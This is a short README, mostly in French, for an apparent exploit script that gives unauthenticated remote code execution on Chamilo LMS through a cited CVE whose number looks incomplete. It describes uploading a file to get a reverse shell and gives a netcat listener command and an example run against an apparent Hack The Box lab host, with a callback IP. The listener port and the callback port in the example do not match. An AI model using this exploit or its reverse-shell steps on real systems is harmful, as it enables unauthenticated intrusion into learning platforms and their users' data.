
Remote Code Execution for Chamilo LMS
pip install requests
Le script python utilise la vulnérabilité CVE-2023-422 pour téléverser un fichier sur le serveur et utilise ce fichier pour envoyer un shell inverse à l'écouteur netcat, le tout sans nécessiter d'authentification. Cependant, vous devrez suivre les étapes ci-dessous pour utiliser le script python avec succès.
Démarrer l'écouteur netcat :
nc -lnvp 4444
Exécution du script Python (exemple) :
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
N'hésitez pas à laisser une étoile si l'exploit suivant vous a été utile :)